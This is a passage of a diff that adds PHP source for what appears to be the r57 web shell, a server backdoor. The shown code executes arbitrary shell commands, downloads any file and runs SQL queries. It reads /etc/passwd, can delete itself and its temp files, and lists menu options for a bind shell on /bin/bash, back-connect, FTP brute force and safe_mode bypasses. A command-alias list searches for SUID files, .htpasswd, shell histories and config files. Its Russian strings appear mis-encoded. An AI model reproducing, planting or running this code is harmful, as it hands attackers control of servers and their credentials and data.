0; + break; + } + return 1; + } + function close() + { + switch($this->db) + { + case 'MySQL': + @mysql_close($this->connection); + break; + case 'MSSQL': + @mssql_close($this->connection); + break; + case 'PostgreSQL': + @pg_close($this->connection); + break; + case 'Oracle': + @oci_close($this->connection); + break; + } + } + function affected_rows() + { + switch($this->db) + { + case 'MySQL': + return @mysql_affected_rows($this->res); + break; + case 'MSSQL': + return @mssql_affected_rows($this->res); + break; + case 'PostgreSQL': + return @pg_affected_rows($this->res); + break; + case 'Oracle': + return @ocirowcount($this->res); + break; + default: + return 0; + break; + } + } + } +if(isset($_GET['img'])&&!empty($_GET['img'])) + { + $images = array(); + $images[1]='R0lGODlhBwAHAIAAAAAAAP///yH5BAEAAAEALAAAAAAHAAcAAAILjI9pkODnYohUhQIAOw=='; + $images[2]='R0lGODlhBwAHAIAAAAAAAP///yH5BAEAAAEALAAAAAAHAAcAAAILjI+pwA3hnmlJhgIAOw=='; + @ob_clean(); + header("Content-type: image/gif"); + echo base64_decode($images[$_GET['img']]); + die(); + } +if(isset($_POST['cmd']) && !empty($_POST['cmd']) && $_POST['cmd']=="download_file" && !empty($_POST['d_name'])) + { + if(!$file=@fopen($_POST['d_name'],"r")) { echo re($_POST['d_name']); $_POST['cmd']=""; } + else + { + @ob_clean(); + $filename = @basename($_POST['d_name']); + $filedump = @fread($file,@filesize($_POST['d_name'])); + fclose($file); + $content_encoding=$mime_type=''; + compress($filename,$filedump,$_POST['compress']); + if (!empty($content_encoding)) { header('Content-Encoding: ' . $content_encoding); } + header("Content-type: ".$mime_type); + header("Content-disposition: attachment; filename=\"".$filename."\";"); + echo $filedump; + exit(); + } + } +if(isset($_GET['phpinfo'])) { echo @phpinfo(); echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href=".$_SERVER['PHP_SELF'].">BACK</a> ]</b></font></div>"; die(); } +if ($_POST['cmd']=="db_query") + { + echo $head; + $sql = new my_sql(); + $sql->db = $_POST['db']; + $sql->host = $_POST['db_server']; + $sql->port = $_POST['db_port']; + $sql->user = $_POST['mysql_l']; + $sql->pass = $_POST['mysql_p']; + $sql->base = $_POST['mysql_db']; + $querys = @explode(';',$_POST['db_query']); + + if(!$sql->connect()) echo "<div align=center><font face=Verdana size=-2 color=red><b>Can't connect to SQL server</b></font></div>"; + else + { + if(!empty($sql->base)&&!$sql->select_db()) echo "<div align=center><font face=Verdana size=-2 color=red><b>Can't select database</b></font></div>"; + else + { + foreach($querys as $num=>$query) + { + if(strlen($query)>5) + { + echo "<font face=Verdana size=-2 color=green><b>Query#".$num." : ".htmlspecialchars($query,ENT_QUOTES)."</b></font><br>"; + switch($sql->query($query)) + { + case '0': + echo "<table width=100%><tr><td><font face=Verdana size=-2>Error : <b>".$sql->error."</b></font></td></tr></table>"; + break; + case '1': + if($sql->get_result()) + { + echo "<table width=100%>"; + foreach($sql->columns as $k=>$v) $sql->columns[$k] = htmlspecialchars($v,ENT_QUOTES); + $keys = @implode("&nbsp;</b></font></td><td bgcolor=#cccccc><font face=Verdana size=-2><b>&nbsp;", $sql->columns); + echo "<tr><td bgcolor=#cccccc><font face=Verdana size=-2><b>&nbsp;".$keys."&nbsp;</b></font></td></tr>"; + for($i=0;$i<$sql->num_rows;$i++) + { + foreach($sql->rows[$i] as $k=>$v) $sql->rows[$i][$k] = htmlspecialchars($v,ENT_QUOTES); + $values = @implode("&nbsp;</font></td><td><font face=Verdana size=-2>&nbsp;",$sql->rows[$i]); + echo '<tr><td><font face=Verdana size=-2>&nbsp;'.$values.'&nbsp;</font></td></tr>'; + } + echo "</table>"; + } + break; + case '2': + $ar = $sql->affected_rows()?($sql->affected_rows()):('0'); + echo "<table width=100%><tr><td><font face=Verdana size=-2>affected rows : <b>".$ar."</b></font></td></tr></table><br>"; + break; + } + } + } + } + } + echo "<br><form name=form method=POST>"; + echo in('hidden','db',0,$_POST['db']); + echo in('hidden','db_server',0,$_POST['db_server']); + echo in('hidden','db_port',0,$_POST['db_port']); + echo in('hidden','mysql_l',0,$_POST['mysql_l']); + echo in('hidden','mysql_p',0,$_POST['mysql_p']); + echo in('hidden','mysql_db',0,$_POST['mysql_db']); + echo in('hidden','cmd',0,'db_query'); + echo "<div align=center><textarea cols=65 rows=10 name=db_query>".(!empty($_POST['db_query'])?($_POST['db_query']):("SHOW DATABASES;\nSELECT * FROM user;"))."</textarea><br><input type=submit name=submit value=\" Run SQL query \"></div><br><br>"; + echo "</form>"; + echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href=".$_SERVER['PHP_SELF'].">BACK</a> ]</b></font></div>"; die(); + } +if(isset($_GET['delete'])) + { + @unlink(@substr(@strrchr($_SERVER['PHP_SELF'],"/"),1)); + } +if(isset($_GET['tmp'])) + { + @unlink("/tmp/bdpl"); + @unlink("/tmp/back"); + @unlink("/tmp/bd"); + @unlink("/tmp/bd.c"); + @unlink("/tmp/dp"); + @unlink("/tmp/dpc"); + @unlink("/tmp/dpc.c"); + } +if(isset($_GET['phpini'])) +{ +echo $head; +function U_value($value) + { + if ($value == '') return '<i>no value</i>'; + if (@is_bool($value)) return $value ? 'TRUE' : 'FALSE'; + if ($value === null) return 'NULL'; + if (@is_object($value)) $value = (array) $value; + if (@is_array($value)) + { + @ob_start(); + print_r($value); + $value = @ob_get_contents(); + @ob_end_clean(); + } + return U_wordwrap((string) $value); + } +function U_wordwrap($str) + { + $str = @wordwrap(@htmlspecialchars($str), 100, '<wbr />', true); + return @preg_replace('!(&[^;]*)<wbr />([^;]*;)!', '$1$2<wbr />', $str); + } +if (@function_exists('ini_get_all')) + { + $r = ''; + echo '<table width=100%>', '<tr><td bgcolor=#cccccc><font face=Verdana size=-2 color=red><div align=center><b>Directive</b></div></font></td><td bgcolor=#cccccc><font face=Verdana size=-2 color=red><div align=center><b>Local Value</b></div></font></td><td bgcolor=#cccccc><font face=Verdana size=-2 color=red><div align=center><b>Master Value</b></div></font></td></tr>'; + foreach (@ini_get_all() as $key=>$value) + { + $r .= '<tr><td>'.ws(3).'<font face=Verdana size=-2><b>'.$key.'</b></font></td><td><font face=Verdana size=-2><div align=center><b>'.U_value($value['local_value']).'</b></div></font></td><td><font face=Verdana size=-2><div align=center><b>'.U_value($value['global_value']).'</b></div></font></td></tr>'; + } + echo $r; + echo '</table>'; + } +echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href=".$_SERVER['PHP_SELF'].">BACK</a> ]</b></font></div>"; +die(); +} +if(isset($_GET['cpu'])) + { + echo $head; + echo '<table width=100%><tr><td bgcolor=#cccccc><div align=center><font face=Verdana size=-2 color=red><b>CPU</b></font></div></td></tr></table><table width=100%>'; + $cpuf = @file("cpuinfo"); + if($cpuf) + { + $c = @sizeof($cpuf); + for($i=0;$i<$c;$i++) + { + $info = @explode(":",$cpuf[$i]); + if($info[1]==""){ $info[1]="---"; } + $r .= '<tr><td>'.ws(3).'<font face=Verdana size=-2><b>'.trim($info[0]).'</b></font></td><td><font face=Verdana size=-2><div align=center><b>'.trim($info[1]).'</b></div></font></td></tr>'; + } + echo $r; + } + else + { + echo '<tr><td>'.ws(3).'<div align=center><font face=Verdana size=-2><b> --- </b></font></div></td></tr>'; + } + echo '</table>'; + echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href=".$_SERVER['PHP_SELF'].">BACK</a> ]</b></font></div>"; + die(); + } +if(isset($_GET['mem'])) + { + echo $head; + echo '<table width=100%><tr><td bgcolor=#cccccc><div align=center><font face=Verdana size=-2 color=red><b>MEMORY</b></font></div></td></tr></table><table width=100%>'; + $memf = @file("meminfo"); + if($memf) + { + $c = sizeof($memf); + for($i=0;$i<$c;$i++) + { + $info = explode(":",$memf[$i]); + if($info[1]==""){ $info[1]="---"; } + $r .= '<tr><td>'.ws(3).'<font face=Verdana size=-2><b>'.trim($info[0]).'</b></font></td><td><font face=Verdana size=-2><div align=center><b>'.trim($info[1]).'</b></div></font></td></tr>'; + } + echo $r; + } + else + { + echo '<tr><td>'.ws(3).'<div align=center><font face=Verdana size=-2><b> --- </b></font></div></td></tr>'; + } + echo '</table>'; + echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href=".$_SERVER['PHP_SELF'].">BACK</a> ]</b></font></div>"; + die(); + } +$lang=array( +'ru_text1' =>'Âûïîëíåííàÿ êîìàíäà', +'ru_text2' =>'Âûïîëíåíèå êîìàíä íà ñåðâåðå', +'ru_text3' =>'Âûïîëíèòü êîìàíäó', +'ru_text4' =>'Ðàáî÷àÿ äèðåêòîðèÿ', +'ru_text5' =>'Çàãðóçêà ôàéëîâ íà ñåðâåð', +'ru_text6' =>'Ëîêàëüíûé ôàéë', +'ru_text7' =>'Àëèàñû', +'ru_text8' =>'Âûáåðèòå àëèàñ', +'ru_butt1' =>'Âûïîëíèòü', +'ru_butt2' =>'Çàãðóçèòü', +'ru_text9' =>'Îòêðûòèå ïîðòà è ïðèâÿçêà åãî ê /bin/bash', +'ru_text10'=>'Îòêðûòü ïîðò', +'ru_text11'=>'Ïàðîëü äëÿ äîñòóïà', +'ru_butt3' =>'Îòêðûòü', +'ru_text12'=>'back-connect', +'ru_text13'=>'IP-àäðåñ', +'ru_text14'=>'Ïîðò', +'ru_butt4' =>'Âûïîëíèòü', +'ru_text15'=>'Çàãðóçêà ôàéëîâ ñ óäàëåííîãî ñåðâåðà', +'ru_text16'=>'Èñïîëüçîâàòü', +'ru_text17'=>'Óäàëåííûé ôàéë', +'ru_text18'=>'Ëîêàëüíûé ôàéë', +'ru_text19'=>'Exploits', +'ru_text20'=>'Èñïîëüçîâàòü', +'ru_text21'=>'Íîâîå èìÿ', +'ru_text22'=>'datapipe', +'ru_text23'=>'Ëîêàëüíûé ïîðò', +'ru_text24'=>'Óäàëåííûé õîñò', +'ru_text25'=>'Óäàëåííûé ïîðò', +'ru_text26'=>'Èñïîëüçîâàòü', +'ru_butt5' =>'Çàïóñòèòü', +'ru_text28'=>'Ðàáîòà â safe_mode', +'ru_text29'=>'Äîñòóï çàïðåùåí', +'ru_butt6' =>'Ñìåíèòü', +'ru_text30'=>'Ïðîñìîòð ôàéëà', +'ru_butt7' =>'Âûâåñòè', +'ru_text31'=>'Ôàéë íå íàéäåí', +'ru_text32'=>'Âûïîëíåíèå PHP êîäà', +'ru_text33'=>'Ïðîâåðêà âîçìîæíîñòè îáõîäà îãðàíè÷åíèé open_basedir ÷åðåç ôóíêöèè cURL', +'ru_butt8' =>'Ïðîâåðèòü', +'ru_text34'=>'Ïðîâåðêà âîçìîæíîñòè îáõîäà îãðàíè÷åíèé safe_mode ÷åðåç ôóíêöèþ include', +'ru_text35'=>'Ïðîâåðêà âîçìîæíîñòè îáõîäà îãðàíè÷åíèé safe_mode ÷åðåç çàãðóçêó ôàéëà â mysql', +'ru_text36'=>'Áàçà . Òàáëèöà', +'ru_text37'=>'Ëîãèí', +'ru_text38'=>'Ïàðîëü', +'ru_text39'=>'Áàçà', +'ru_text40'=>'Äàìï òàáëèöû áàçû äàííûõ', +'ru_butt9' =>'Äàìï', +'ru_text41'=>'Ñîõðàíèòü â ôàéëå', +'ru_text42'=>'Ðåäàêòèðîâàíèå ôàéëà', +'ru_text43'=>'Ðåäàêòèðîâàòü ôàéë', +'ru_butt10'=>'Ñîõðàíèòü', +'ru_butt11'=>'Ðåäàêòèðîâàòü', +'ru_text44'=>'Ðåäàêòèðîâàíèå ôàéëà íåâîçìîæíî! Äîñòóï òîëüêî äëÿ ÷òåíèÿ!', +'ru_text45'=>'Ôàéë ñîõðàíåí', +'ru_text46'=>'Ïðîñìîòð phpinfo()', +'ru_text47'=>'Ïðîñìîòð íàñòðîåê php.ini', +'ru_text48'=>'Óäàëåíèå âðåìåííûõ ôàéëîâ', +'ru_text49'=>'Óäàëåíèå ñêðèïòà ñ ñåðâåðà', +'ru_text50'=>'Èíôîðìàöèÿ î ïðîöåññîðå', +'ru_text51'=>'Èíôîðìàöèÿ î ïàìÿòè', +'ru_text52'=>'Òåêñò äëÿ ïîèñêà', +'ru_text53'=>'Èñêàòü â ïàïêå', +'ru_text54'=>'Ïîèñê òåêñòà â ôàéëàõ', +'ru_butt12'=>'Íàéòè', +'ru_text55'=>'Òîëüêî â ôàéëàõ', +'ru_text56'=>'Íè÷åãî íå íàéäåíî', +'ru_text57'=>'Ñîçäàòü/Óäàëèòü Ôàéë/Äèðåêòîðèþ', +'ru_text58'=>'Èìÿ', +'ru_text59'=>'Ôàéë', +'ru_text60'=>'Äèðåêòîðèþ', +'ru_butt13'=>'Ñîçäàòü/Óäàëèòü', +'ru_text61'=>'Ôàéë ñîçäàí', +'ru_text62'=>'Äèðåêòîðèÿ ñîçäàíà', +'ru_text63'=>'Ôàéë óäàëåí', +'ru_text64'=>'Äèðåêòîðèÿ óäàëåíà', +'ru_text65'=>'Ñîçäàòü', +'ru_text66'=>'Óäàëèòü', +'ru_text67'=>'Chown/Chgrp/Chmod', +'ru_text68'=>'Êîìàíäà', +'ru_text69'=>'Ïàðàìåòð1', +'ru_text70'=>'Ïàðàìåòð2', +'ru_text71'=>"Âòîðîé ïàðàìåòð êîìàíäû:\r\n- äëÿ CHOWN - èìÿ íîâîãî ïîëüçîâàòåëÿ èëè åãî UID (÷èñëîì) \r\n- äëÿ êîìàíäû CHGRP - èìÿ ãðóïïû èëè GID (÷èñëîì) \r\n- äëÿ êîìàíäû CHMOD - öåëîå ÷èñëî â âîñüìåðè÷íîì ïðåäñòàâëåíèè (íàïðèìåð 0777)", +'ru_text72'=>'Òåêñò äëÿ ïîèñêà', +'ru_text73'=>'Èñêàòü â ïàïêå', +'ru_text74'=>'Èñêàòü â ôàéëàõ', +'ru_text75'=>'* ìîæíî èñïîëüçîâàòü ðåãóëÿðíîå âûðàæåíèå', +'ru_text76'=>'Ïîèñê òåêñòà â ôàéëàõ ñ ïîìîùüþ óòèëèòû find', +'ru_text80'=>'Òèï', +'ru_text81'=>'Ñåòü', +'ru_text82'=>'Áàçû äàííûõ', +'ru_text83'=>'Âûïîëíåíèå SQL çàïðîñà', +'ru_text84'=>'SQL çàïðîñ', +'ru_text85'=>'Ïðîâåðêà âîçìîæíîñòè îáõîäà îãðàíè÷åíèé safe_mode ÷åðåç âûïîëíåíèå êîìàíä â MSSQL ñåðâåðå', +'ru_text86'=>'Ñêà÷èâàíèå ôàéëà ñ ñåðâåðà', +'ru_butt14'=>'Ñêà÷àòü', +'ru_text87'=>'Ñêà÷èâàíèå ôàéëîâ ñ óäàëåííîãî ftp-ñåðâåðà', +'ru_text88'=>'FTP-ñåðâåð:ïîðò', +'ru_text89'=>'Ôàéë íà ftp ñåðâåðå', +'ru_text90'=>'Ðåæèì ïåðåäà÷è', +'ru_text91'=>'Àðõèâèðîâàòü â', +'ru_text92'=>'áåç àðõèâàöèè', +'ru_text93'=>'FTP', +'ru_text94'=>'FTP-áðóòôîðñ', +'ru_text95'=>'Ñïèñîê ïîëüçîâàòåëåé', +'ru_text96'=>'Íå óäàëîñü ïîëó÷èòü ñïèñîê ïîëüçîâàòåëåé', +'ru_text97'=>'Ïðîâåðåíî êîìáèíàöèé: ', +'ru_text98'=>'Óäà÷íûõ ïîäêëþ÷åíèé: ', +'ru_text99'=>'* â êà÷åñòâå ëîãèíà è ïàðîëÿ èñïîëüçóåòñÿ èìÿ ïîëüçîâàòåëÿ èç /etc/passwd', +'ru_text100'=>'Îòïðàâêà ôàéëîâ íà óäàëåííûé ôòï ñåðâåð', +'ru_text101'=>'Èñïîëüçîâàòü òàêæå ïåðåâåðíóòîå (user -> resu) èìÿ ïîëüçîâàòåëÿ â êà÷åñòâå ïàðîëÿ', +'ru_text102'=>'Ïî÷òà', +'ru_text103'=>'Îòïðàâêà ïèñüìà', +'ru_text104'=>'Îòïðàâêà ôàéëà íà ïî÷òîâûé ÿùèê', +'ru_text105'=>'Êîìó', +'ru_text106'=>'Îò', +'ru_text107'=>'Òåìà', +'ru_butt15'=>'Îòïðàâèòü', +'ru_text108'=>'Òåêñò ïèñüìà', +'ru_text109'=>'Ñâåðíóòü', +'ru_text110'=>'Ðàçâåðíóòü', +'ru_text111'=>'SQL-Ñåðâåð : ïîðò', +'ru_text112'=>'Ïðîâåðêà âîçìîæíîñòè îáõîäà îãðàíè÷åíèé safe_mode ÷åðåç èñïîëüçîâàíèå ôóíêöèè mb_send_mail', +'ru_text113'=>'Ïðîâåðêà âîçìîæíîñòè îáõîäà îãðàíè÷åíèé safe_mode, ïðîñìîòð ëèñòèíãà äèðåêòîðèé ñ èñïîëüçîâàíèåì imap_list', +'ru_text114'=>'Ïðîâåðêà âîçìîæíîñòè îáõîäà îãðàíè÷åíèé safe_mode, ïðîñìîòð ñîäåðæèìîãî ôàéëà ñ èñïîëüçîâàíèåì imap_body', +/* --------------------------------------------------------------- */ +'eng_text1' =>'Executed command', +'eng_text2' =>'Execute command on server', +'eng_text3' =>'Run command', +'eng_text4' =>'Work directory', +'eng_text5' =>'Upload files on server', +'eng_text6' =>'Local file', +'eng_text7' =>'Aliases', +'eng_text8' =>'Select alias', +'eng_butt1' =>'Execute', +'eng_butt2' =>'Upload', +'eng_text9' =>'Bind port to /bin/bash', +'eng_text10'=>'Port', +'eng_text11'=>'Password for access', +'eng_butt3' =>'Bind', +'eng_text12'=>'back-connect', +'eng_text13'=>'IP', +'eng_text14'=>'Port', +'eng_butt4' =>'Connect', +'eng_text15'=>'Upload files from remote server', +'eng_text16'=>'With', +'eng_text17'=>'Remote file', +'eng_text18'=>'Local file', +'eng_text19'=>'Exploits', +'eng_text20'=>'Use', +'eng_text21'=>'&nbsp;New name', +'eng_text22'=>'datapipe', +'eng_text23'=>'Local port', +'eng_text24'=>'Remote host', +'eng_text25'=>'Remote port', +'eng_text26'=>'Use', +'eng_butt5' =>'Run', +'eng_text28'=>'Work in safe_mode', +'eng_text29'=>'ACCESS DENIED', +'eng_butt6' =>'Change', +'eng_text30'=>'Cat file', +'eng_butt7' =>'Show', +'eng_text31'=>'File not found', +'eng_text32'=>'Eval PHP code', +'eng_text33'=>'Test bypass open_basedir with cURL functions', +'eng_butt8' =>'Test', +'eng_text34'=>'Test bypass safe_mode with include function', +'eng_text35'=>'Test bypass safe_mode with load file in mysql', +'eng_text36'=>'Database . Table', +'eng_text37'=>'Login', +'eng_text38'=>'Password', +'eng_text39'=>'Database', +'eng_text40'=>'Dump database table', +'eng_butt9' =>'Dump', +'eng_text41'=>'Save dump in file', +'eng_text42'=>'Edit files', +'eng_text43'=>'File for edit', +'eng_butt10'=>'Save', +'eng_text44'=>'Can\'t edit file! Only read access!', +'eng_text45'=>'File saved', +'eng_text46'=>'Show phpinfo()', +'eng_text47'=>'Show variables from php.ini', +'eng_text48'=>'Delete temp files', +'eng_butt11'=>'Edit file', +'eng_text49'=>'Delete script from server', +'eng_text50'=>'View cpu info', +'eng_text51'=>'View memory info', +'eng_text52'=>'Find text', +'eng_text53'=>'In dirs', +'eng_text54'=>'Find text in files', +'eng_butt12'=>'Find', +'eng_text55'=>'Only in files', +'eng_text56'=>'Nothing :(', +'eng_text57'=>'Create/Delete File/Dir', +'eng_text58'=>'name', +'eng_text59'=>'file', +'eng_text60'=>'dir', +'eng_butt13'=>'Create/Delete', +'eng_text61'=>'File created', +'eng_text62'=>'Dir created', +'eng_text63'=>'File deleted', +'eng_text64'=>'Dir deleted', +'eng_text65'=>'Create', +'eng_text66'=>'Delete', +'eng_text67'=>'Chown/Chgrp/Chmod', +'eng_text68'=>'Command', +'eng_text69'=>'param1', +'eng_text70'=>'param2', +'eng_text71'=>"Second commands param is:\r\n- for CHOWN - name of new owner or UID\r\n- for CHGRP - group name or GID\r\n- for CHMOD - 0777, 0755...", +'eng_text72'=>'Text for find', +'eng_text73'=>'Find in folder', +'eng_text74'=>'Find in files', +'eng_text75'=>'* you can use regexp', +'eng_text76'=>'Search text in files via find', +'eng_text80'=>'Type', +'eng_text81'=>'Net', +'eng_text82'=>'Databases', +'eng_text83'=>'Run SQL query', +'eng_text84'=>'SQL query', +'eng_text85'=>'Test bypass safe_mode with commands execute via MSSQL server', +'eng_text86'=>'Download files from server', +'eng_butt14'=>'Download', +'eng_text87'=>'Download files from remote ftp-server', +'eng_text88'=>'FTP-server:port', +'eng_text89'=>'File on ftp', +'eng_text90'=>'Transfer mode', +'eng_text91'=>'Archivation', +'eng_text92'=>'without archivation', +'eng_text93'=>'FTP', +'eng_text94'=>'FTP-bruteforce', +'eng_text95'=>'Users list', +'eng_text96'=>'Can\'t get users list', +'eng_text97'=>'checked: ', +'eng_text98'=>'success: ', +'eng_text99'=>'* use username from /etc/passwd for ftp login and password', +'eng_text100'=>'Send file to remote ftp server', +'eng_text101'=>'Use reverse (user -> resu) login for password', +'eng_text102'=>'Mail', +'eng_text103'=>'Send email', +'eng_text104'=>'Send file to email', +'eng_text105'=>'To', +'eng_text106'=>'From', +'eng_text107'=>'Subj', +'eng_butt15'=>'Send', +'eng_text108'=>'Mail', +'eng_text109'=>'Hide', +'eng_text110'=>'Show', +'eng_text111'=>'SQL-Server : Port', +'eng_text112'=>'Test bypass safe_mode with function mb_send_mail', +'eng_text113'=>'Test bypass safe_mode, view dir list via imap_list', +'eng_text114'=>'Test bypass safe_mode, view file contest via imap_body', +); +/* +Àëèàñû êîìàíä +Ïîçâîëÿþò èçáåæàòü ìíîãîêðàòíîãî íàáîðà îäíèõ è òåõ-æå êîìàíä. ( Ñäåëàíî áëàãîäàðÿ ìîåé ïðèðîäíîé ëåíè ) +Âû ìîæåòå ñàìè äîáàâëÿòü èëè èçìåíÿòü êîìàíäû. +*/ +$aliases=array( +'find suid files'=>'find / -type f -perm -04000 -ls', +'find suid files in current dir'=>'find . -type f -perm -04000 -ls', +'find sgid files'=>'find / -type f -perm -02000 -ls', +'find sgid files in current dir'=>'find . -type f -perm -02000 -ls', +'find config.inc.php files'=>'find / -type f -name config.inc.php', +'find config.inc.php files in current dir'=>'find . -type f -name config.inc.php', +'find config* files'=>'find / -type f -name "config*"', +'find config* files in current dir'=>'find . -type f -name "config*"', +'find all writable files'=>'find / -type f -perm -2 -ls', +'find all writable files in current dir'=>'find . -type f -perm -2 -ls', +'find all writable directories'=>'find / -type d -perm -2 -ls', +'find all writable directories in current dir'=>'find . -type d -perm -2 -ls', +'find all writable directories and files'=>'find / -perm -2 -ls', +'find all writable directories and files in current dir'=>'find . -perm -2 -ls', +'find all service.pwd files'=>'find / -type f -name service.pwd', +'find service.pwd files in current dir'=>'find . -type f -name service.pwd', +'find all .htpasswd files'=>'find / -type f -name .htpasswd', +'find .htpasswd files in current dir'=>'find . -type f -name .htpasswd', +'find all .bash_history files'=>'find / -type f -name .bash_history', +'find .bash_history files in current dir'=>'find . -type f -name .bash_history', +'find all .mysql_history files'=>'find / -type f -name .mysql_history', +'find .mysql_history files in current dir'=>'find . -type f -name .mysql_history', +'find all .fetchmailrc files'=>'find / -type f -name .fetchmailrc', +'find .fetchmailrc files in current dir'=>'find . -type f -name .fetchmailrc', +'list file attributes on a Linux second extended file system'=>'lsattr -va', +'show opened ports'=>'netstat -an | grep -i listen', +'----------------------------------------------------------------------------------------------------'=>'ls -la' +); +$table_up1 = "<tr><td bgcolor=#cccccc><font face=Verdana size=-2><b><div align=center>:: "; +$table_up2 = " ::</div></b></font></td></tr><tr><td>"; +$table_up3 = "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#cccccc>"; +$table_end1 = "</td></tr>"; +$arrow = " <font face=Wingdings color=gray>è</font>"; +$lb = "<font color=black>[</font>"; +$rb = "<font color=black>]</font>"; +$font = "<font face=Verdana size=-2>"; +$ts = "<table class=table1 width=100% align=center>"; +$te = "</table>"; +$fs = "<form name=form method=POST>"; +$fe = "</form>"; + +if(isset($_GET['users'])) + { + if(!$users=get_users()) { echo "<center><font face=Verdana size=-2 color=red>".$lang[$language.'_text96']."</font></center>"; } + else + { + echo '<center>'; + foreach($users as $user) { echo $user."<br>"; } + echo '</center>'; + } + echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href=".$_SERVER['PHP_SELF'].">BACK</a> ]</b></font></div>"; die(); + } + +if (!empty($_POST['dir'])) { @chdir($_POST['dir']); } +$dir = @getcwd(); +$windows = 0; +$unix = 0; +if(strlen($dir)>1 && $dir[1]==":") $windows=1; else $unix=1; +if(empty($dir)) + { + $os = getenv('OS'); + if(empty($os)){ $os = php_uname(); } + if(empty($os)){ $os ="-"; $unix=1; } + else + { + if(@eregi("^win",$os)) { $windows = 1; } + else { $unix = 1; } + } + } +if(!empty($_POST['s_dir']) && !empty($_POST['s_text']) && !empty($_POST['cmd']) && $_POST['cmd'] == "search_text") + { + echo $head; + if(!empty($_POST['s_mask']) && !empty($_POST['m'])) { $sr = new SearchResult($_POST['s_dir'],$_POST['s_text'],$_POST['s_mask']); } + else { $sr = new SearchResult($_POST['s_dir'],$_POST['s_text']); } + $sr->SearchText(0,0); + $res = $sr->GetResultFiles(); + $found = $sr->GetMatchesCount(); + $titles = $sr->GetTitles(); + $r = ""; + if($found > 0) + { + $r .= "<TABLE width=100%>"; + foreach($res as $file=>$v) + { + $r .= "<TR>"; + $r .= "<TD colspan=2><font face=Verdana size=-2><b>".ws(3); + $r .= ($windows)? str_replace("/","\\",$file) : $file; + $r .= "</b></font></ TD>"; + $r .= "</TR>"; + foreach($v as $a=>$b) + { + $r .= "<TR>"; + $r .= "<TD align=center><B><font face=Verdana size=-2>".$a."</font></B></TD>"; + $r .= "<TD><font face=Verdana size=-2>".ws(2).$b."</font></TD>"; + $r .= "</TR>\n"; + } + } + $r .= "</TABLE>"; + echo $r; + } + else + { + echo "<P align=center><B><font face=Verdana size=-2>".$lang[$language.'_text56']."</B></font></P>"; + } + echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href=".$_SERVER['PHP_SELF'].">BACK</a> ]</b></font></div>"; + die(); + } +if(strpos(ex("echo abcr57"),"r57")!=3) { $safe_mode = 1; } +$SERVER_SOFTWARE = getenv('SERVER_SOFTWARE'); +if(empty($SERVER_SOFTWARE)){ $SERVER_SOFTWARE = "-"; } +function ws($i) +{ +return @str_repeat("&nbsp;",$i); +} +function ex($cfe) +{ + $res = ''; + if (!empty($cfe)) + { + if(function_exists('exec')) + { + @exec($cfe,$res); + $res = join("\n",$res); + } + elseif(function_exists('shell_exec')) + { + $res = @shell_exec($cfe); + } + elseif(function_exists('system')) + { + @ob_start(); + @system($cfe); + $res = @ob_get_contents(); + @ob_end_clean(); + } + elseif(function_exists('passthru')) + { + @ob_start(); + @passthru($cfe); + $res = @ob_get_contents(); + @ob_end_clean(); + } + elseif(@is_resource($f = @popen($cfe,"r"))) + { + $res = ""; + while(!@feof($f)) { $res .= @fread($f,1024); } + @pclose($f); + } + } + return $res; +} +function get_users() +{ + $users = array(); + $rows=file('/etc/passwd'); + if(!$rows) return 0; + foreach ($rows as $string) + { + $user = @explode(":",$string); + if(substr($string,0,1)!='#') array_push($users,$user[0]); + } + return $users; +} +function we($i) +{ +if($GLOBALS['language']=="ru"){ $text = 'Îøèáêà! Íå ìîãó çàïèñàòü â ôàéë '; } +else { $text = "[-] ERROR! Can't write in file "; } +echo "<table width=100% cellpadding=0 cellspacing=0><tr><td bgcolor=#cccccc><font color=red face=Verdana size=-2><div align=center><b>".$text.$i."</b></div></font></td></tr></table>"; +return null; +} +function re($i) +{ +if($GLOBALS['language']=="ru"){ $text = 'Îøèáêà! Íå ìîãó ïðî÷èòàòü ôàéë '; } +else { $text = "[-] ERROR! Can't read file "; } +echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#cccccc><font color=red face=Verdana size=-2><div align=center><b>".$text.$i."</b></div></font></td></tr></table>"; +return null; +} +function ce($i) +{ +if($GLOBALS['language']=="ru"){ $text = "Íå óäàëîñü ñîçäàòü "; } +else { $text = "Can't create "; } +echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#cccccc><font color=red face=Verdana size=-2><div align=center><b>".$text.$i."</b></div></font></td></tr></table>"; +return null; +} +function fe($l,$n) +{ +$text['ru'] = array('Íå óäàëîñü ïîäêëþ÷èòüñÿ ê ftp ñåðâåðó','Îøèáêà àâòîðèçàöèè íà ftp ñåðâåðå','Íå óäàëîñü ïîìåíÿòü äèðåêòîðèþ íà ftp ñåðâåðå'); +$text['eng'] = array('Connect to ftp server failed','Login to ftp server failed','Can\'t change dir on ftp server'); +echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#cccccc><font color=red face=Verdana size=-2><div align=center><b>".$text[$l][$n]."</b></div></font></td></tr></table>"; +return null; +} +function mr($l,$n) +{ +$text['ru'] = array('Íå óäàëîñü îòïðàâèòü ïèñüìî','Ïèñüìî îòïðàâëåíî'); +$text['eng'] = array('Can\'t send mail','Mail sent'); +echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#cccccc><font color=red face=Verdana size=-2><div align=center><b>".$text[$l][$n]."</b></div></font></td></tr></table>"; +return null; +} +function perms($mode) +{ +if ($GLOBALS['windows']) return 0; +if( $mode & 0x1000 ) { $type='p'; } +else if( $mode & 0x2000 ) { $type='c'; } +else if( $mode & 0x4000 ) { $type='d'; } +else if( $mode & 0x6000 ) { $type='b'; } +else if( $mode & 0x8000 ) { $type='-'; } +else if( $mode & 0xA000 ) { $type='l'; } +else if( $mode & 0xC000 ) { $type='s'; } +else $type='u'; +$owner["read"] = ($mode & 00400) ? 'r' : '-'; +$owner["write"] = ($mode & 00200) ? 'w' : '-'; +$owner["execute"] = ($mode & 00100) ? 'x' : '-'; +$group["read"] = ($mode & 00040) ? 'r' : '-'; +$group["write"] = ($mode & 00020) ? 'w' : '-'; +$group["execute"] = ($mode & 00010) ? 'x' : 